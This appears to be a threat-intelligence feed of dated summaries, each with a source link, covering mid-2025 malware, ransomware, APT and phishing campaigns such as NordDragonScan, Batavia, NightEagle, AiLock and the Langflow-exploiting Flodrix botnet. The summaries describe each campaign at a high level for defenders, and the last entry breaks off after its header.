Summary:: Researchers at GDATA Security Lab have identified a global cryptomining campaign leveraging XMRig to mine Monero cryptocurrency that emerged in April 2025. The campaign begins with the execution of batch script files via svchost.exe, followed by PowerShell commands that download and execute additional payloads. The attackers create scheduled tasks to disable Windows Defender and automatic update services before deploying the XMRig miner under random names to evade detection. They use LOLBAS techniques and hidden PowerShell windows to ensure persistence, leading to down system performance, increased energy consumption, and disruption of system maintenance. The malware has been observed in multiple countries, indicating targets systems worldwide.

Source: https://www.gdatasoftware.com/blog/2025/07/38228-monero-malware-xmrig-resurgence

Intel Source:: Fortinet

Intel Name:: NordDragonScan_Target_Window_Systems

Date of Scan:: 2025-07-09

Impact:: MEDIUM

Summary:: Researchers at FortiGuard have discovered a new information-stealing malware called NordDragonScan, targeting Windows systems primarily in Ukraine’s government and energy sectors. The malware is distributed through shortened URLs and malicious shortcut files which executes a malicious HTA script that installs a .NET-based payload. It leverages a legitimate PowerShell binary to downloads a hidden payload and installs a file named adblocker.exe inside a folder named NordDragonScan. Once installed, it collects system information, capture screenshots, steals files and PDFs from common directories and extracts saved browser data from Chrome and Firefox. Additionally, it also scans the local network to identify other reachable systems and exfiltrates all collected data to a remote server over HTTPS. Victims are lured with fake Ukrainian-language documents related to government and energy sector communications.

Source: https://www.fortinet.com/blog/threat-research/norddragonscan-quiet-data-harvester-on-windows

Intel Source:: Securelist

Intel Name:: Batavia_Malware_Targeting_Russia

Date of Scan:: 2025-07-09

Impact:: LOW

Summary:: Securelist researchers have discovered a new malware strain called Batavia that emerged in July 2024. This malware targets Russian industrial enterprises and is delivered through spear-phishing emails disguised as business contracts. When a victim clicks the malicious link, it downloads a VBScript- downloader that decrypts and installs additional payloads which involves two separate executable files —WebView.exe and javav.exe, are used to collect sensitive files such as Microsoft Office documents, system logs, and files from USB drives or other removable media. Additionally, Batavia takes screenshots of the victim's screen and computes file hashes to avoid uploading duplicate files. The malware communicates with its C2 server over HTTPS and obfuscates its payloads using XOR and Base64 encoding. To maintain persistence, it creates a shortcut in the Start Menu's startup folder, ensuring execution on each user login.

Source: https://securelist.com/batavia-spyware-steals-data-from-russian-organizations/116866/

Intel Source:: RedDrip7

Intel Name:: NightEagle_Exploits_Exchange_for_Espionage

Date of Scan:: 2025-07-08

Impact:: MEDIUM

Summary:: Researchers at RedDrip7 have disclosed that the APT group NightEagle exploited a previously unknown Microsoft Exchange deserialization vulnerability to achieve remote code execution on targeted Exchange servers. The group’s operations appear to be strategically motivated, with a focus on exfiltrating sensitive email data from high-tech Chinese organizations. To establish internal network access, NightEagle deployed a modified Chisel reverse tunnel disguised as a legitimate Synology update service. This was followed by memory-only injection of a custom .NET loader delivered through virtual URL web shells. The implant enabled sustained, covert remote email harvesting and command execution while avoiding disk-based detection mechanisms.

Source: https://github.com/RedDrip7/NightEagle_Disclose/blob/main/Exclusive%20disclosure%20of%20the%20attack%20activities%20of%20the%20APT%20group%20NightEagle.pdf

Intel Source:: unit42

Intel Name:: Tomcat_Partial_PUT_Camel_Header_Hijack

Date of Scan:: 2025-07-08

Impact:: MEDIUM

Summary:: During March 2025, Unit 42 observed a surge in attacks leveraging two critical Apache vulnerabilities. CVE-2025-24813 permits remote deserialization via Tomcat’s standard partial PUT mechanism, and CVE-2025-27636/29891 abuse Camel’s header processing to execute arbitrary commands. Exploitation attempts exceeded 7,800 across more than 70 countries, confirming a global automated campaign. Attackers identify targets via session name enumeration and Content-Range manipulation before delivering payloads that result in remote code execution.

Source: https://unit42.paloaltonetworks.com/apache-cve-2025-24813-cve-2025-27636-cve-2025-29891/

Intel Source:: CCITIC

Intel Name:: Datacarry_Ransomware_Campaign

Date of Scan:: 2025-07-07

Impact:: MEDIUM

Summary:: The Cyber Counter-Intelligence Threat Investigation Consortium (CCITIC) have identified a targeted campaign by the Datacarry ransomware group, active since June 2024 and significantly intensifying in spring 2025. The group exploiting a critical vulnerability in Fortinet EMS (CVE-2023-48788) to gain initial access. Following exploitation, they use PowerShell to configure the environment for deploying a Go-based implant, which enables persistent command-and-control communication via the Chisel tunneling tool over WebSockets. The actors exfiltrate large volumes of data before deploying a Conti-variant ransomware payload.

Source: https://www.ccitic.org/assets/reports/CCITIC_Report_TLP-White_DATACARRY.pdf

Intel Source:: Cyfirma

Intel Name:: APT36_Targets_Indian_Defence_Via_BOSS_Linux_Systems

Date of Scan:: 2025-07-07

Impact:: MEDIUM

Summary:: Researchers from Cyfirma have uncovered a spear-phishing campaign conducted by APT36 also known as Transparent Tribe targeting Indian defense personnel leveraging BOSS Linux systems. The attackers send ZIP archives containing a malicious desktop shortcut file. When clicked, it downloads and displays a legitimate PowerPoint decoy while simultaneously retrieving and launching a GO-based ELF binary in the background. The ELF payload establishes a persistent C2 channel over a non-standard port, enabling data exfiltration and covert screenshot capture. It also gathers system information, enumerates storage drives, and uses obfuscated logging routines to evade detection.

Source: https://www.cyfirma.com/research/phishing-attack-deploying-malware-on-indian-defense-boss-linux/

Intel Source:: Medium(S2W Threat Research)

Intel Name:: AiLock_Ransomware_Operation

Date of Scan:: 2025-07-07

Impact:: MEDIUM

Summary:: Researchers at S2W Threat Intelligence Center have observed the AiLock ransomware campaign emerge in March 2025, leveraging a dual-threaded ChaCha20 and NTRUEncrypt engine to encrypt files and deploy ransom demands. Initial detection by Zscaler highlighted two early victims, with five organizations publicly listed on the group’s leak site by July 4, 2025, confirming active data exfiltration. The actor exploits native Windows APIs to terminate critical services and empty recycle bins, maximizing encryption coverage, while employing XOR-based string obfuscation and multithreaded I/O Completion Ports for stealth and performance.

Source: https://medium.com/s2wblog/detailed-analysis-of-ailock-ransomware-1d3263beff15?source=rss----30a8766b5c42---4

Intel Source:: KB4ThreatLabs

Intel Name:: Atera_RMM_Phishing_Campaign

Date of Scan:: 2025-07-07

Impact:: MEDIUM

Summary:: Researchers from KnowBe4 ThreatLabs have identified a targeted phishing campaign exploiting Social Security statement updates to distribute a malicious MSI installer masquerading as the Atera Agent RMM. On July 3, 2025, threat actors leveraged compromised email accounts to send a lure offering a “30-day free trial,” thereby deploying the legitimate Atera RMM on Windows hosts. By abusing the platform’s living-off-the-land capabilities, adversaries establish persistent C2 channels that enable file transfers, interactive shell access and AI-assisted command execution via the RMM web console.

Source: https://x.com/Kb4Threatlabs/status/1940759187514183827

Intel Source:: ASEC

Intel Name:: XwormRAT_Distributing_via_Steganography

Date of Scan:: 2025-07-06

Impact:: LOW

Summary:: Researchers at ASEC have uncovered a phishing campaign distributing XwormRAT malware leveraging steganography. The attackers send phishing emails containing a compressed .RAR archive which includes a VBScript and JavaScript hybrid file that acts as a dropper. When opened, this script runs a PowerShell command that downloads JPEG image which hides malicious code using steganography techniques. The PowerShell script removes dummy characters from the image and decodes Base64 or bitmap-encoded data to extract and execute the final XwormRAT payload. The campaign primarily targets corporate users involved in procurement and supply chains, using fake requests for quotation as lures from a Hong Kong based entity.

Source: https://asec.ahnlab.com/ko/88785/

Intel Source:: Checkpoint

Intel Name:: Amazon_Prime_Day_Phishing_Campaign

Date of Scan:: 2025-07-06

Impact:: LOW

Summary:: Check Point researchers have uncovered a widespread phishing campaign targeting Amazon customers ahead of Prime Day 2025, scheduled for July 8th. Threat actors have registered numerous fake domains designed to impersonate official Amazon websites to trick users into revealing their login details and payment information. These spoofed websites closely mimic Amazon’s official sign-in pages while the phishing emails disguised as official Amazon communications often using urgent subject lines such as Refund Due – Amazon System Error to lure recipients into clicking malicious links. Upon successful compromise, attackers can gain access to user accounts, conduct unauthorized purchases, identity theft, and abuse of saved gift cards.

Source: https://blog.checkpoint.com/research/amazon-prime-day-2025-deals-await-but-so-do-the-cyber-criminals-2/

Intel Source:: NSFocus

Intel Name:: Hpingbot_Distributing_Malware_Via_Pastebin

Date of Scan:: 2025-07-06

Impact:: MEDIUM

Summary:: NSFOCUS researchers have identified a new botnet known as hpingbot, developed in Go based language and designed to operate across multiple platforms, including Linux, IoT, and Windows systems. This botnet abuses Pastebin to distribute its malicious payloads and leverages hping3 to launch DDoS attacks. It has two primary objectives: first, to deliver additional malware to compromise systems and second, to conduct network attacks that can disrupt online services. It maintains communication with its C2 server by sending small heartbeat signals to Pastebin every ten seconds and downloads additional malicious tools via curl or wget commands. The malware employs multiple techniques such as Systemd, SysVinit, and Cron to maintain persistence.

Source: https://nsfocusglobal.com/hpingbot-a-new-botnet-family-based-on-pastebin-payload-delivery-chain-and-hping3-ddos-module/

Intel Source:: Koi Security

Intel Name:: FoxyWallet_Malware_Campaign

Date of Scan:: 2025-07-06

Impact:: LOW

Summary:: Researchers at Koi Security have discovered a malicious campaign called FoxyWallet targeting cryptocurrency users since at least April 2025. The attackers developed over 40 counterfeit Firefox browser extensions that impersonate legitimate cryptocurrency wallets such as MetaMask, Coinbase, Trust Wallet, and Phantom. These fake extensions replicate the names, logos and open-source code of the original wallets while also inflating fake reviews to trick users into downloading them. Once installed, the extensions capture seed phrases and private keys through web portal input interception and silently exfiltrate information to attacker-controlled servers along with users’ external IP addresses.

Source: https://blog.koi.security/foxywallet-40-malicious-firefox-extensions-exposed-4c14419de486

Intel Source:: WIZ

Intel Name:: Exploitation_of_Java_Debug_for_Crypto_Mining

Date of Scan:: 2025-07-05

Impact:: LOW

Summary:: Researchers at Wiz discovered that an unknown attacker deployed a cryptomining payload after exposing Java Debug Wire Protocol (JDWP) endpoints on a decoy TeamCity CI/CD server. The attackers scan the internet for systems with the JDWP port (TCP/5005) open, confirms active sessions, and then executes system commands using Java’s built-in tools. They download a malicious script that removes other miners and install a hidden version of the XMRig miner disguised as a logrotate utility. To maintain persistence, the attackers make changes to ensure the miner restarts on login, reboot, or at scheduled times. They also leverage proxies and hardcoded configuration to hide the cryptocurrency wallet address and evade detection.

Source: https://www.wiz.io/blog/exposed-jdwp-exploited-in-the-wild

Intel Source:: Elastic Labs

Intel Name:: Exploitation_of_SHELLTER_Framework_to_Spread_Malware

Date of Scan:: 2025-07-05

Impact:: LOW

Summary:: Researchers at Elastic Security have uncovered several financially motivated cyber campaigns leveraging SHELLTER Elite v11.0 to distribute data-stealing malware. This tool, which was released in April 2025, is being abused by attackers for its evasion capabilities. It enables malware to bypass both traditional antivirus and behaviour-based detection mechanisms by employing techniques such as AES-128 CBC encryption, fake code to confuse scanners, API obfuscation, and in-memory bypasses for Windows security features like AMSI. Additionally, attackers utilize stealth techniques including DLL preloading and indirect system calls to avoid detection. Researchers also identified three prominent infostealers being used—LUMMA, ARECHCLIENT2 (also known as Sectop RAT), and RHADAMANTHYS—each distributed through various platforms such as MediaFire, YouTube comments, and even underground forums.

Source: https://www.elastic.co/security-labs/taking-shellter

Intel Source:: K7 Labs

Intel Name:: MentalPositive_macOS_Stealer_Variant

Date of Scan:: 2025-07-05

Impact:: LOW

Summary:: K7 Security Labs researchers have observed a new macOS stealer attributed to the actor "mentalpositive," which mirrors core functionalities of the 2023 Atomic macOS Stealer (AMOS) but introduces distinct characteristics suggesting a potential fork or early-stage evolution. The malware targets macOS users and executes using Unix process-hollowing tactics to evade terminal and session management detection, employing system calls to disable terminal processes and maintain stealth.

Source: https://labs.k7computing.com/index.php/mentalpositives-new-macos-stealer-amos-repackaged-or-a-new-cyber-threat/

Intel Source:: France’s Cybersecurity Agency - ANSSI

Intel Name:: Ivanti_CSA_Zero_Day_Exploitation_Campaign

Date of Scan:: 2025-07-04

Impact:: HIGH

Summary:: According to ANSSI’s analysis, the Houken intrusion set leveraged three zero-day vulnerabilities in Ivanti Cloud Service Appliance (CVE-2024-8190, CVE-2024-8963 and CVE-2024-9380) in September 2024 to gain initial access to French governmental, telecommunications, media, finance and transport networks . Operators executed a base64-encoded Python script to decrypt and harvest administrative credentials, deployed or created PHP webshells, modified legitimate PHP resources to embed backdoors and occasionally installed a sophisticated kernel-space rootkit for persistence. Infrastructure relied on commercial VPN services, Tor exit nodes and diverse VPS configurations, indicating a blend of commodity services and bespoke tooling . ANSSI suspects Houken acts as an initial access broker linked to UNC5174, selling footholds to state-linked entities while also exhibiting profit-driven behaviors such as data exfiltration and cryptomining.

Source: https://www.cert.ssi.gouv.fr/uploads/CERTFR-2025-CTI-009.pdf

Intel Source:: Cofense

Intel Name:: Phishing_Campaigns_Exploit_ES_Domains_of_Spain

Date of Scan:: 2025-07-04

Impact:: LOW

Summary:: Researchers at Cofense have observed a significant increase in the use of Spain’s top-level domain ending in [.]es to conduct phishing campaigns. The volume of malicious .es websites leveraged for phishing jumped nearly 20 times between late 2024 and early 2025. Threat actors are distributing emails containing .es links, either embedded directly in the message or within attachments to trick people into clicking. These links often redirect to deceptive login pages designed to steal usernames and passwords, especially for Microsoft accounts. These phishing campaigns impersonate major organisations such as Microsoft, Adobe and Google. These phishing sites are hosted on Cloudflare infrastructure and employ CAPTCHA challenges to enhance legitimacy and evade automated detection.

Source: https://cofense.com/blog/spain-tld-s-recent-rise-to-dominance

Intel Source:: Silent Push

Intel Name:: Chinese_Actors_Targeting_E_Commerce_Websites

Date of Scan:: 2025-07-04

Impact:: MEDIUM

Summary:: Researchers at Silent Push have uncovered a large-scale phishing campaign operated by a Chinese-speaking threat actor targeting online shoppers around the globe via thousands of spoofed e-commerce websites. These deceptive websites impersonate legitimate online retailers such as Apple, PayPal, Wayfair, REI, Michael Kors, and Nordstrom to execute fraudulent payment schemes. The campaign emerged during Mexico’s Hot Sale 2025 event, targeting Spanish-speaking users, but subsequently analysis revealed a widespread operation also targeting at English-speaking consumers across multiple regions. There are many spoofed domains which are embedded with functional Google Pay widgets that allow the attacker to steal legitimate payments through real transactions. The threat actors employ various tactics involve website cloning, abuse of online payment APIs, and site misdirection using deceptive branding and domain obfuscation. Additionally, researchers also believe that thousands of fraudulent sites remain active despite takedown efforts.

Source: https://www.silentpush.com/blog/fake-marketplace/?utm_source=rss&utm_medium=rss&utm_campaign=fake-marketplace

Intel Source:: unit42

Intel Name:: LNK_Malware_Abuse_for_Stealthy_Payload_Delivery

Date of Scan:: 2025-07-04

Impact:: MEDIUM

Summary:: Researchers from Unit 42 have identified extensive and evolving misuse of Windows Shortcut (LNK) files by threat actors to facilitate covert malware execution. Adversaries are abusing the flexibility of LNK files to execute embedded or referenced payloads using trusted system binaries such as powershell.exe, cmd.exe, wscript.exe, and rundll32.exe. The observed techniques fall into four main categories: exploit-based execution, direct file execution, in-argument script execution, and overlay content delivery. The latter is increasingly favored, with attackers appending encoded malicious content to the end of LNK files and executing it through scripts or utilities like findstr or mshta.exe. Obfuscation of command-line arguments, dynamic environment variable usage, and base64-encoded payloads are employed to evade detection and hinder analysis.

Source: https://unit42.paloaltonetworks.com/lnk-malware/

Intel Source:: SentinelLABS

Intel Name:: DPRK_NimDoor_Malware_Targeting_macOS

Date of Scan:: 2025-07-03

Impact:: LOW

Summary:: SentinelLABS researchers have uncovered a sophisticated campaign by DPRK threat actors, dubbed NimDoor, targeting Web3 and crypto-related businesses on the macOS platform. The operation, active since at least April 2025, begins with social engineering to trick users into running a malicious AppleScript disguised as a Zoom update. This initiates a multi-stage attack using an eclectic mix of C++, AppleScript, and Nim-compiled binaries. The actors employ advanced and unusual TTPs for macOS, including process injection, encrypted WebSocket (wss) for C2 communications, and a novel persistence mechanism that uses signal handlers (SIGINT/SIGTERM) to install a LaunchAgent upon termination. The ultimate goal is to exfiltrate sensitive data, including Keychain credentials, browser data, and Telegram user information, using custom Bash scripts.

Source: https://www.sentinelone.com/labs/macos-nimdoor-dprk-threat-actors-target-web3-and-crypto-platforms-with-nim-based-malware/

Intel Source:: Fortinet

Intel Name:: DCRat_Masquerades_as_Colombian_Government

Date of Scan:: 2025-07-03

Impact:: MEDIUM

Summary:: Researchers at FortiGuard Labs have identified an ongoing malware campaign leveraging DCRat, a modular remote access trojan, to target entities in Colombia through a phishing operation that impersonates a Colombian government agency. The attack chain begins with a ZIP file delivered via email, containing an obfuscated VBS script designed to evade detection and analysis. This script launches obfuscated PowerShell code that retrieves a second-stage image payload encoded with base64 data and steganography, which ultimately delivers the RAT executable.

Source: https://www.fortinet.com/blog/threat-research/dcrat-impersonating-the-columbian-government

Intel Source:: Medium (Walmart Global Tech Blog)

Intel Name:: Janela_RAT_with_Chromium_Stealer_Extension

Date of Scan:: 2025-07-02

Impact:: LOW

Summary:: Walmart Global Tech researchers have observed a multi-stage attack campaign delivering Janela RAT alongside a malicious browser extension, leveraging MSI installers hosted on GitLab. The Janela RAT, a likely variant of BX RAT previously linked to LATAM targeting, is dropped via an installer that embeds a Go-based binary and multiple scripts. These scripts establish execution logic, unzip payloads, and load the browser extension covertly into Chromium-based browsers using native messaging APIs. The extension is equipped to execute commands such as screenshot capture, system reconnaissance, and data collection, including cookies, browsing history, and installed extensions. Command and control (C2) communication is facilitated via WebSockets and encoded configuration retrieved from GitLab-hosted files.

Source: https://medium.com/walmartglobaltech/janela-rat-and-a-stealer-extension-delivered-together-e274469a7df8

Intel Source:: OTS Security

Intel Name:: Snake_Keylogger_Phishing_Targets_Oil_Sector

Date of Scan:: 2025-07-02

Impact:: MEDIUM

Summary:: OTS Security researchers have observed a new spear-phishing campaign delivers the Russian-origin Snake Keylogger to targets in the global oil and gas industry by impersonating a Kazakh petroleum company. The attack uses a novel DLL sideloading technique, abusing the legitimate Java utility jsadebugd.exe to inject the stealer malware into the InstallUtil.exe process. Once active, the malware establishes persistence via a registry Run key and harvests a wide range of credentials from dozens of browsers and applications for exfiltration over SMTP.

Source: https://mp.weixin.qq.com/s/cQ0cV_lbvGH3q6JI8TtNRQ

Intel Source:: ANY.RUN

Intel Name:: DEVMAN_Ransomware

Date of Scan:: 2025-07-02

Impact:: MEDIUM

Summary:: Researchers at ANY.RUN have uncovered a new ransomware strain, DEVMAN, operating as a custom variant within the DragonForce Ransomware-as-a-Service (RaaS) ecosystem. The actor primarily targeting victims across Asia and Africa, using a dedicated leak site to pressure victims after data exfiltration and encryption. While reusing a significant amount of DragonForce's Conti-derived codebase, DEVMAN introduces unique traits, such as a flawed builder that encrypts its own ransom notes. Key TTPs include probing for SMB shares to spread laterally and abusing the Windows Restart Manager to bypass file locks and encrypt critical system files like NTUSER.DAT.

Source: https://any.run/cybersecurity-blog/devman-ransomware-analysis/

Intel Source:: PolySwarm

Intel Name:: CVE_2025_3248_Langflow_Exploit_for_Flodrix_Botnet

Date of Scan:: 2025-07-01

Impact:: MEDIUM

Summary:: PolySwarm researchers have identified active exploitation of a critical unauthenticated remote code execution vulnerability — CVE-2025-3248 — in the Langflow AI development framework. Threat actors are leveraging publicly available proof-of-concept exploits to compromise unpatched Langflow instances and deploy the Flodrix botnet, a more advanced variant of the LeetHozer malware family. The attack chain begins with widespread scanning for exposed Langflow deployments, followed by exploitation to deliver a Python-based payload. Once infected, the Flodrix malware enables attackers to conduct DDoS attacks and potentially exfiltrate sensitive data, while employing evasion tactics such as self-deletion and string obfuscation to bypass detection. With a CVSS score of 9.8, this vulnerability presents a severe risk of complete system compromise and service disruption for organizations running outdated or unpatched versions of Langflow.

Source: https://blog.polyswarm.io/threat-actors-exploit-cve-2025-3248-to-deliver-flodrix-botnet

Intel Source:: Arctic Wolf Labs

Intel Name:: UAC_0226_Targets_Government_and_Defence_Entities

Date of Scan:: 2025-07-01

Impact:: MEDIUM

Summary:: Researchers from Arctic Wolf have identified a malware named GIFTEDCROOK, developed by cyber-espionage group UAC-0226. Initially this malware was a basic browser credential stealer but now it has transformed into a sophisticated data exfiltration platform. The latest version (v1.3) is capable of stealing not only browser data but also a sensitive data based on their file type, size, and recent changes. UAC-0226 distributes this malware through spear-phishing emails containing fake military-themed PDF attachment that impersonate Ukrainian government agencies. These campaigns coincided with critical geopolitical events, including the June 2025 Ukraine-Russia negotiations in Istanbul, which shows that the attackers are targeting Ukrainian government and military information for intelligence purposes. The malware employs encrypted file archives, sends stolen data through Telegram channels and deletes itself to evade detection.

Source: https://arcticwolf.com/resources/blog/giftedcrook-strategic-pivot-from-browser-stealer-to-data-exfiltration-platform/

Intel Source:: picussecurity

Intel Name:: Anubis_RaaS_with_Wiper_Capability

Date of Scan:: 2025-07-01

Impact:: MEDIUM

Summary:: Researchers at Picus Security have detailed the Anubis Ransomware-as-a-Service (RaaS) operation, a significant threat observed since December 2024 that has evolved to combine data encryption with an optional, destructive file-wiping function. Operators gain initial access via spear-phishing before executing the payload, which is highly configurable through command-line parameters. The malware performs stealthy privilege checks, disables security and backup services, and deletes Volume Shadow Copies to maximize impact and prevent recovery.

Source: https://www.picussecurity.com/resource/blog/anubis-ransomware-targets-global-victims-with-wiper-functionality

Intel Source:: The DFIR Report

Intel Name:: RansomHub_Exploits_RDP_via_Password_Spray

Date of Scan:: 2025-07-01

Impact:: MEDIUM

Summary:: Researchers at The DFIR Report have observed a RansomHub affiliate campaign actively compromising networks through password spray attacks against exposed Remote Desktop Protocol (RDP) services, achieving complete network compromise and ransomware deployment in under six days. Following initial access, the attacker moves rapidly, using tools like Mimikatz for credential harvesting and network scanners for discovery. Persistence is established using legitimate remote management tools such as Atera and Splashtop to blend in with normal administrative activity.

Source: https://thedfirreport.com/2025/06/30/hide-your-rdp-password-spray-leads-to-ransomhub-deployment/

Intel Source:: Darktrace

Intel Name:: Blind_Eagle_Phishing_Campaign

Date of Scan:: 2025-06-30

Impact:: MEDIUM

Summary:: Researchers at Darktrace have identified that the threat actor known as Blind Eagle (APT-C-36) is actively carrying out a phishing campaign targeting organizations across Latin America, with a particular emphasis on Colombia. The group primarily focuses on the government, financial, and critical infrastructure sectors. Their attack chain typically begins with a phishing email that leads victims to download a malicious payload, often exploiting the WebDAV protocol. Blind Eagle has shown a high degree of adaptability, continuing to employ low-interaction attack techniques even after the relevant Microsoft vulnerability was patched. The group using Remote Access Trojans (RATs) and Dynamic DNS to establish resilient command-and-control (C2) infrastructure, enabling persistent access and extensive data exfiltration.

Source: https://www.darktrace.com/blog/patch-and-persist-darktraces-detection-of-blind-eagle-apt-c-36?&web_view=true

Intel Source:: ForcePoint

Intel Name:: Remcos_Malware_Campaign

Date of Scan:: 2025-06-30

Impact:: LOW

Summary:: Forcepoint researchers have uncovered an ongoing Remcos malware campaign that leverages phishing emails from compromised email accounts belonging to small businesses and educational institutions to maintain long-term access to infected systems. These emails contain malicious LNK files inside TAR archives which trigger a PowerShell script that downloads a hidden malware file disguised as PDF. The malware leverages a special path-parsing techniques (\\?\C:\) to creates fake Windows directories. It uses heavily obfuscated batch scripts and renames system tools to evade detection. The malware establishes persistence via scheduled tasks and weakens UAC protections by modifying registry settings. Once active, the malware injects itself into legitimate Windows processes like SndVol.exe and communicates with C2 server hosted on OVHcloud using an uncommon port to receive instructions and send back stolen data.

Source: https://www.forcepoint.com/blog/x-labs/remcos-malware-new-face

Intel Source:: CERT-UA

Intel Name:: APT28_Deploys_BEARDSHELL_and_COVENANT_Backdoors

Date of Scan:: 2025-06-28

Impact:: MEDIUM

Summary:: CERT-UA researchers have observed that the UAC-0001 threat group (APT28) conducted a multi-stage cyber attack against Ukrainian government agencies in March-April 2024. The actors deployed a sophisticated toolset that includes the BEARDSHELL and SLIMAGENT backdoors, as well as the open-source COVENANT C2 framework. Initial access was likely gained through a malicious document delivered via the Signal messenger, which executed a macro to initiate a complex infection chain. This chain using COM hijacking for persistence and leverages legitimate cloud services, such as Koofr and Icedrive, for C2 communications, making the traffic difficult to detect. The final payload, BEARDSHELL, is a C++ backdoor capable of loading and executing PowerShell scripts. The attack's objective appears to be espionage, underscored by the deployment of SLIMAGENT, a tool designed for taking and exfiltrating encrypted screenshots.

Source: https://cert.gov.ua/article/6284080

Intel Source:: Darkatlas

Intel Name:: APT38_Infrastructure_Hunt_Uncovers_macOS_Malware

Date of Scan:: 2025-06-27

Impact:: MEDIUM

Summary:: Darkatlas researchers have uncovered an active command-and-control infrastructure belonging to the North Korean state-sponsored threat actor APT38 (Bluenoroff). This financially motivated subgroup of the Lazarus Group continues to target the global financial sector, including banks, cryptocurrency exchanges, and SWIFT endpoints. By pivoting on technical fingerprints, such as the JARM hash of a known malicious server's SSL certificate, researchers identified a network of related infrastructure. This network was subsequently linked to the deployment of the Cosmic Rust malware family, a payload specifically designed to target macOS platforms. The findings demonstrate that APT38 remains active, is expanding its operational infrastructure, and is leveraging macOS malware as part of its espionage and theft campaigns.

Source: https://darkatlas.io/blog/bluenoroff-apt38-live-infrastructure-hunting

Intel Source:: Cyberarmor

Intel Name:: SSA_Themed_Phishing_Campaign

Date of Scan:: 2025-06-27

Impact:: LOW

Summary:: Researchers at CyberArmor have discovered a phishing campaign in which cybercriminals tricked over 2,000 people by impersonating official communications from the U.S. Social Security Administration (SSA). The attackers send phishing emails containing links that redirect to a deceptive SSA-themed page hosted on Amazon Web Services. This page instructs victims to click Access The Statement which redirect them to another page with instructions to download and execute a file. The downloaded file is a .NET-based malware loader. Once executed, the malware deploys ScreenConnect for remote access and activates a backdoor named ENTRYPOINT to silently connect to the attacker’s server and gain control over the victim’s system.

Source: https://cyberarmor.tech/hacker-exploit-social-security-statement-theme-to-target-over-2000-victims-with-malware/

Intel Source:: Cyfirma

Intel Name:: Odyssey_Stealer_macOS_Infostealer

Date of Scan:: 2025-06-26

Impact:: LOW

Summary:: Researchers at CYFIRMA have identified Odyssey Stealer, a Malware-as-a-Service (MaaS) info-stealer actively targeting macOS users. Attributed to a threat actor known as "Rodrigo," the malware is a rebrand of Poseidon Stealer and targets individuals in Western countries interested in finance and cryptocurrency, with command-and-control infrastructure primarily hosted in Russia. The attack begins with a "Clickfix" social engineering tactic, using typosquatted domains that present a fake Cloudflare CAPTCHA to trick users into running a malicious AppleScript command in their terminal. This script executes the primary payload, which is designed to steal a wide range of sensitive data, including browser credentials, session tokens, personal documents, macOS Keychain data, and, critically, private keys and seed phrases from numerous cryptocurrency wallets.

Source: https://www.cyfirma.com/research/odyssey-stealer-the-rebrand-of-poseidon-stealer/

Intel Source:: ASEC

Intel Name:: WogRAT_Malware_Targets_Window_and_Linux_Systems

Date of Scan:: 2025-06-26

Impact:: LOW

Summary:: ASEC researchers have discovered a coordinated campaign that targets both Windows and Linux web servers, including IIS-based systems. The attackers gain initial access through file upload vulnerabilities to deploy ASP/ASPX web shells, enabling persistent access and command execution. After gaining access, the attackers leverage tools like Ladon, Fscan, MeshAgent, and WogRAT for scanning, privilege escalation, and remote access. The attackers show advanced capabilities by deploying malware that works on both Windows (PE) and Linux (ELF) systems. They also move across the network using Windows tools like WMIExec and steal login details using credential dumping tools such as Network Password Dump.

Source: https://asec.ahnlab.com/ko/88559/

Intel Source:: Knowsec 404 Advanced Threat Intelligence Team

Intel Name:: Confucius_APT_Deploys_New_Anondoor_Backdoor

Date of Scan:: 2025-06-25

Impact:: MEDIUM

Summary:: The Knowsec 404 Advanced Threat Intelligence Team have identified an evolved malware campaign from the Confucius APT group. This campaign, targeting government and military entities in South and East Asia, deploys a new componentized backdoor named "anondoor." The attack initiates via a LNK file which uses a legitimate Python executable to side-load the malicious anondoor DLL. A key evolution in this campaign is the malware's modularity; anondoor acts as a downloader, receiving instructions and C2 details from the server to fetch and execute subsequent components, such as the "wooperstealer" infostealer. Persistence is established via a scheduled task created by the initial implant.

Source: https://paper.seebug.org/3332/

Intel Source:: Google Threat Intelligence

Intel Name:: ASP_Phishing_Targets_Critics_of_Russia

Date of Scan:: 2025-06-25

Impact:: MEDIUM

Summary:: Researchers at Google Threat Intelligence Group (GTIG) reports on a sophisticated social engineering campaign by UNC6293, a threat actor assessed with low confidence as being associated with the Russia-linked group APT29. Active since at least April 2025, the campaign targets prominent academics and critics of Russia to gain persistent access to their Gmail accounts. Attackers build rapport with targets before sending lures impersonating entities like the U.S. Department of State, using spoofed email addresses to enhance legitimacy. The objective is to convince the target to create a Google Application Specific Password (ASP) and share the 16-digit code, a method which bypasses standard multi-factor authentication and grants the actor ongoing access to the victim's mailbox.

Source: https://cloud.google.com/blog/topics/threat-intelligence/creative-phishing-academics-critics-of-russia

Intel Source:: Xlab

Intel Name:: Pickai_AI_Backdoor_Supply_Chain_Attack

Date of Scan:: 2025-06-24

Impact:: LOW

Summary:: Researchers from XLab have discovered that threat actors are actively exploiting vulnerabilities in the ComfyUI AI framework to deploy a C++ backdoor named Pickai. First observed in February 2025, the campaign's primary objective is the theft of sensitive AI-related data, leveraging command execution and reverse shell capabilities. The malware achieves stealth through process name spoofing and ensures survivability with a highly redundant persistence strategy, creating up to ten distinct service entries on compromised Linux hosts. In a significant escalation, the threat has become a supply chain attack, with malware being distributed from the compromised infrastructure of Rubick.ai, a commercial AI platform serving the e-commerce sector.

Source: https://blog.xlab.qianxin.com/pickai-the_backdoor_hiding_in_your_ai_stack/

Intel Source:: Xlab Blog (Wang Hao)

Intel Name:: RapperBot_IoT_Botnet_Adds_Extortion

Date of Scan:: 2025-06-23

Impact:: LOW

Summary:: Analysis from Qi'anxin's XLAB have revealed the continued evolution of the RapperBot botnet, a large-scale threat that has been active since at least 2021. Primarily used for DDoS-for-hire attacks, the botnet has recently pivoted to include direct extortion, demanding "protection fees" from victims. Comprising over 50,000 bots, the malware targets a wide range of industries globally by exploiting weak Telnet credentials and known vulnerabilities in IoT devices like routers and network cameras. The botnet employs evolving DNS-TXT records for C2 discovery and features multiple custom encryption routines to protect its components.

Source: https://blog.xlab.qianxin.com/rapperbot-en/

Intel Source:: CyberArmor

Intel Name:: LogMeIn_RAT_Delivered_via_Vercel_Phishing

Date of Scan:: 2025-06-22

Impact:: LOW

